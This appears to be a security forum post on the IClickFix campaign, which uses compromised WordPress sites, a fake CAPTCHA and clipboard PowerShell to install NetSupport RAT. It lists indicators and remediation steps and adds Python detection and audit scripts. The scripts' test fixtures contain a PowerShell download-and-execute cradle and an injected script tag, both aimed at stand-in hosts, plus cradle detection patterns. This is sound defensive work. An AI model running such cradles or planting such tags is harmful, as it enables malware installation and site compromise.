Meet IClickFix: a widespread WordPress-targeting framework using the ClickFix tactic

Khushal
Apr 4, 2024
Sekoia details IClickFix, a ClickFix campaign rotating multi-stage JavaScript loaders across compromised WordPress sites. The loader serves a fake Cloudflare Turnstile CAPTCHA, then clipboard-driven PowerShell drops NetSupport RAT.
What Sekoia is describing here is a “ClickFix” style infection chain: the compromised WordPress site is mainly a delivery mechanism, but the actual “execution” happens only if the visitor follows the fake verification instructions (typically copy/paste + run), which then kicks off PowerShell to fetch and install a remote access payload (NetSupport RAT).

Why this works (and why it’s hard to stop with just “web filtering”)
  • The JavaScript/redirect chain rotates infrastructure and fingerprints visitors, so static blocking/IOCs age quickly.
  • The fake Cloudflare Turnstile page is social engineering: it tries to make the user run a command “to verify you’re human.”
  • If the user runs what’s in the clipboard (PowerShell), the browser is no longer the only boundary—now you’re in native code / system tooling territory.

Practical takeaways for end users
  • Never paste/run commands from a website (Win+R, PowerShell, Terminal, “Run as admin”) to “verify,” “fix,” or “unlock” content. Legit CAPTCHAs do not require local commands.
  • If you did run such a command: disconnect from the network, then perform offline/second-opinion scans (Microsoft Defender + a reputable on-demand scanner). After that, check for persistence (Startup items, Scheduled Tasks, Services) and remove unknown remote admin software.
  • If this happened on a work device, treat it as a security incident and escalate internally rather than “cleaning and moving on.”

Practical takeaways for defenders (Windows environments)
  • Harden against “living-off-the-land” launch patterns:
    • Application control (WDAC/AppLocker) where feasible to restrict PowerShell and common script hosts for standard users.
    • Microsoft Defender Attack Surface Reduction rules (ASR) can materially reduce script-driven dropper behavior in many environments (test before broad rollout).
    • Monitor for suspicious PowerShell spawned from user context soon after browser activity, especially one-liners that download/execute content (common patterns: web request + execute, encoded commands, unusual child processes).
  • Don’t rely on single IOCs. Focus detections on behavior: clipboard-to-Run instruction flow, PowerShell download cradles, new persistence shortly after a browser session.

Practical takeaways for WordPress site owners
  • Assume initial compromise is upstream of the visitor: keep WP core/themes/plugins updated, remove abandoned/nulled plugins, and enforce strong admin hygiene (2FA, least privilege, new admin-user review).
  • Look for injected/obfuscated JavaScript in theme files, plugins, and database content; restore from known-good backups where possible.
  • Add a WAF/CDN ruleset and continuous file integrity monitoring to catch reinjection quickly.
  • Rotate credentials (WP admins, hosting panel, SFTP/SSH, database) after cleanup.

Bottom line
This isn’t “a CAPTCHA exploit”; it’s a scalable social-engineering framework using compromised WordPress sites as traffic sources and PowerShell as the execution bridge, ending in a remote access foothold. The most effective countermeasures are user education against “run this command,” plus endpoint controls/detections that limit or flag suspicious PowerShell and persistence creation.

Technical Analysis & Remediation

Attack Vector & Infection Chain
The infection relies on "Pastejacking" (Clipboard Hijacking) rather than traditional exploit kits.

Injection
Compromised WordPress sites load a malicious script identified by the HTML ID ic-tracker-js.

Lure
A fake overlay mimics a browser check (Cloudflare Turnstile).

Execution
The user is instructed to click "I am not a robot," which copies a PowerShell payload to the clipboard. The user is then socially engineered to press Win+R (Run), Ctrl+V (Paste), and Enter.

Payload
The PowerShell script downloads and executes NetSupport RAT (often disguised as client32.exe), granting the attacker full remote control.

MITRE ATT&CK Mapping

T1204.001 (User Execution)
Malicious Link/Clipboard Paste.

T1059.001 (Command and Scripting Interpreter)
PowerShell execution via Run dialog.

T1566.002 (Phishing)
Spearphishing Link (via compromised legitimate sites).

T1219 (Remote Access Software)
NetSupport Manager usage.

Live Evidence & Indicators (IOCs)

Specific Marker
The presence of the script tag id="ic-tracker-js" in the page source.

C2/TDS Domains
ototaikfffkf[.]com (Active TDS domain).
185.196.8[.]0/24 (Network range often associated with ClickFix infrastructure).

Payload Artifacts

Files
client32.exe, client32.ini located in %APPDATA% or C:\ProgramData.

PowerShell Pattern
Base64 strings starting with SQB (often decodes to IEX).

Remediation - THE ENTERPRISE TRACK (SANS PICERL)

Phase 1: Identification & Containment

Hunt Query (SIEM/EDR)
Search for process creation events where explorer.exe spawns powershell.exe with arguments containing UseBypass or EncodedCommand immediately following a browser process focus.

Network Block
Blacklist ototaikfffkf[.]com and block traffic to known NetSupport RAT C2 IPs at the firewall level.

CMS Audit
Scan all managed WordPress instances for the ic-tracker-js string in theme headers (header.php) or plugin files.

Phase 2: Eradication

Process Termination
Kill active instances of client32.exe or suspicious mshta.exe processes.

File Removal
Delete the NetSupport installation directories (commonly hidden in C:\ProgramData\{Random_GUID}).

Persistence Removal
Audit Registry keys at HKCU\Software\Microsoft\Windows\CurrentVersion\Run for entries pointing to the RAT artifacts.

Phase 3: Recovery

Credential Reset
Force password resets for users who visited compromised sites, as NetSupport RAT likely harvested browser-stored credentials.

Re-imaging
For high-value targets, re-image the machine to ensure no secondary backdoors (e.g., CS beacons) remain.

Phase 4: Lessons Learned

Policy Update
Implement GPO to restrict the "Run" dialog (Win+R) or monitor clipboard usage for large scripts.

User Training
Conduct specific training on "Pastejacking"—users should never paste code into the Run dialog or Terminal.

Remediation - THE HOME USER TRACK

Priority 1: Safety & Disconnection

Disconnect
Immediately unplug your ethernet cable or disable Wi-Fi to sever the connection to the attacker.

Check Startup Items
Press Ctrl+Shift+Esc (Task Manager) -> Startup tab. Disable anything that looks like "NetSupport," "Client32," or random letters (e.g., xyqz.exe).

Priority 2: Scan & Clean

Run a Full Scan
Use Microsoft Defender or Malwarebytes to scan for "NetSupport RAT".

Manual Check
Open File Explorer, type %APPDATA% in the address bar, and look for suspicious folders created recently containing .exe files you don't recognize.

Priority 3: Identity Protection

Change Passwords
Once the PC is clean (or using a different, safe device), change passwords for your email, banking, and social media. The malware allows attackers to see your screen and steal saved passwords.

Hardening & References

Baseline (CIS/NIST)
CIS Benchmark 18.9.1: Ensure PowerShell Constrained Language Mode is enabled to limit the impact of malicious scripts.

NIST SP 800-83
Guide to Malware Incident Prevention and Handling (Focus on User Awareness).

Tactical Reference
Pattern Match: Look for id="ic-tracker-js" in website source code to confirm infection.

Traffic
Watch for HTTP POST requests to .php endpoints on uncommon ports (often used by NetSupport for C2).

Sources
Sekoia.io Blog
 
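The post's hunt query (explorer.exe spawning powershell.exe with an encoded command) and its "SQB" observation (base64 of UTF-16LE text beginning with "I", as in IEX) can be turned into concrete detection logic. The script below is an added example, not Sekoia's or MalwareTips' code: it decodes -EncodedCommand blobs the way PowerShell does, checks the raw and decoded command line for download-and-execute cradle markers, and weights the result by parent process and hidden-window flags. The event dictionaries mimic a simplified Sysmon process-creation record; every event, user name and URL in it is constructed, and the scoring thresholds are an assumption to tune per environment.

```python
"""Hunt logic for Run-dialog PowerShell download cradles.

Added illustration for the post above, not Sekoia's or MalwareTips' code.
The event dictionaries mimic a simplified Sysmon Event ID 1 (process
creation) record; all events, users and URLs below are constructed.
"""
import base64
import re

# Script hosts a ClickFix lure typically drives the victim into launching.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
# Win+R / Run-dialog launches arrive with explorer.exe as the parent process.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Download-and-execute cradle markers, checked on the raw and the decoded command.
CRADLE_RE = re.compile(
    r"\biex\b|invoke-expression|downloadstring|downloadfile|invoke-webrequest"
    r"|\biwr\b|net\.webclient|start-bitstransfer|frombase64string|\bmshta\b|\bcurl\b",
    re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.  -ep and
# -ExecutionPolicy do not match because the optional suffix must start with c or n.
ENC_RE = re.compile(r"(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)


def encode_for_demo(script: str) -> str:
    """PowerShell's -EncodedCommand format (UTF-16LE, then base64).

    Used here only to build fixtures; a script beginning with 'I' (as in
    IEX) always encodes to a blob starting with 'SQB', which is the
    pattern the post mentions."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev: dict) -> dict:
    """Score one process-creation event.  'alert' needs encoding or a cradle
    plus corroborating context; 'review' flags weaker single signals."""
    result = {"image": ev["image"], "decoded": None, "findings": [],
              "score": 0, "verdict": "none"}
    if ev["image"].lower() not in SCRIPT_HOSTS:
        return result
    cmd = ev["cmdline"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        result["decoded"] = decoded
        result["findings"].append("encoded command")
        result["score"] += 2
    if CRADLE_RE.search(cmd + "\n" + (decoded or "")):
        result["findings"].append("download/execute cradle")
        result["score"] += 2
    if HIDDEN_RE.search(cmd):
        result["findings"].append("hidden window")
        result["score"] += 1
    # Parent context only matters once something else already looks off.
    if result["score"] and ev["parent"].lower() in INTERACTIVE_PARENTS:
        result["findings"].append("launched from explorer.exe (Run dialog)")
        result["score"] += 1
    if result["score"] >= 4:
        result["verdict"] = "alert"
    elif result["score"] >= 1:
        result["verdict"] = "review"
    return result


def analyze_events(events):
    return [analyze_event(e) for e in events]


# Constructed fixtures: one ClickFix-style launch, one ordinary interactive
# PowerShell use, one encoded but harmless management script.
DEMO_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe", "user": "LAB\\alice",
     "cmdline": "powershell.exe -NoP -w hidden -ep bypass -enc " + encode_for_demo(DEMO_CRADLE)},
    {"parent": "explorer.exe", "image": "powershell.exe", "user": "LAB\\alice",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Users\\alice\\Documents"'},
    {"parent": "ccmexec.exe", "image": "powershell.exe", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -EncodedCommand "
                + encode_for_demo("Get-Service wuauserv | Out-Null")},
]

if __name__ == "__main__":
    for r in analyze_events(SAMPLE_EVENTS):
        print(r["verdict"], r["score"], r["findings"])
```

The decode step matters more than the string match: an EDR rule that only greps the command line for "IEX" misses the encoded form entirely, while matching on the "SQB" prefix alone also fires on any encoded script that happens to start with "I". Decoding and then matching gives both coverage and precision, and the parent-process bonus keeps routine management tooling (the third fixture) at "review" rather than "alert".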
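The post's CMS audit step (scan managed WordPress instances for the ic-tracker-js marker in header.php or plugin files) is a one-line grep for the known indicator, but a scan that also flags script tags loading from hosts other than the site's own and inline scripts that combine eval/atob with long encoded blobs will catch the next rotation of the same injection. The script below is an added example, not Sekoia's or MalwareTips' tooling: it walks a document root, collects every script element with Python's HTML parser, and reports the page's marker id plus the two generic signs. The site host name (shop.example.invalid), the temporary demo tree, and the domain tds.example.invalid are constructed; only the id "ic-tracker-js" comes from the post.

```python
"""Audit a WordPress document root for the IClickFix marker and for
generic signs of injected script tags.

Added illustration for the post above, not Sekoia's or MalwareTips'
tooling.  The site host name and the demo files are constructed; the
only page-derived indicator is the script id "ic-tracker-js".
"""
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

MARKER_ID = "ic-tracker-js"             # indicator reported in the post
SCAN_EXT = {".php", ".html", ".htm"}    # files that can carry HTML script tags
OBFUSCATION_RE = re.compile(r"eval\s*\(|atob\s*\(|String\.fromCharCode|unescape\s*\(")
LONG_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")


class ScriptCollector(HTMLParser):
    """Collect (attributes, inline body) for every <script> element."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = (dict(attrs), [])

    def handle_data(self, data):
        if self._current is not None:
            self._current[1].append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            attrs, parts = self._current
            self.scripts.append((attrs, "".join(parts)))
            self._current = None


def script_host(src: str):
    """Host of an absolute or protocol-relative src; None for local paths."""
    if src.startswith("//"):
        src = "https:" + src
    try:
        return urlparse(src).hostname
    except ValueError:          # e.g. bracketed/defanged host strings
        return None


def scan_text(text: str, path: str, own_hosts: set) -> list:
    """Return (path, reason, detail) tuples for one file's contents."""
    findings = []
    if MARKER_ID in text:
        findings.append((path, "known IClickFix marker", f'id="{MARKER_ID}"'))
    parser = ScriptCollector()
    parser.feed(text)
    for attrs, body in parser.scripts:
        src = attrs.get("src")
        if src:
            host = script_host(src)
            if host and host not in own_hosts:
                findings.append((path, "third-party script src", host))
        elif OBFUSCATION_RE.search(body) and LONG_BLOB_RE.search(body):
            findings.append((path, "obfuscated inline script",
                             OBFUSCATION_RE.search(body).group(0)))
    return findings


def scan_tree(root: str, own_hosts: set) -> list:
    """Walk a document root and scan every template/plugin file."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in SCAN_EXT:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_text(fh.read(), path, own_hosts))
    return findings


def build_demo_site() -> str:
    """Constructed WordPress-like tree: one injected header, one clean footer,
    one abandoned plugin carrying an obfuscated inline script."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    files = {
        "wp-content/themes/shop/header.php":
            '<?php wp_head(); ?>\n'
            '<script src="/wp-includes/js/jquery/jquery.min.js"></script>\n'
            '<script id="ic-tracker-js" src="https://tds.example.invalid/t.js"></script>\n',
        "wp-content/themes/shop/footer.php":
            '<script src="https://shop.example.invalid/assets/app.js"></script>\n'
            '<script>document.addEventListener("DOMContentLoaded", init);</script>\n',
        "wp-content/plugins/abandoned/inject.php":
            '<?php /* stale plugin */ ?>\n'
            '<script>eval(atob("' + "QUJD" * 40 + '"));</script>\n',
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, reason, detail in scan_tree(build_demo_site(), {"shop.example.invalid"}):
        print(f"{reason}: {detail} [{path}]")
```

Run it against a real document root with the site's own hosts (and any CDN hosts you deliberately use) in own_hosts; every "third-party script src" hit that is not on that allow-list deserves a look, and the marker check is kept as a plain substring test so that it also fires on database exports and minified files the HTML parser never sees. The same scan belongs in the file-integrity monitoring the post recommends, since reinjection after cleanup is the common failure mode.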
Appreciate the share, it’s a strong reminder that even small security basics can make a big difference in serious attacks. 🔐
 
  • Like
Reactions: Khushal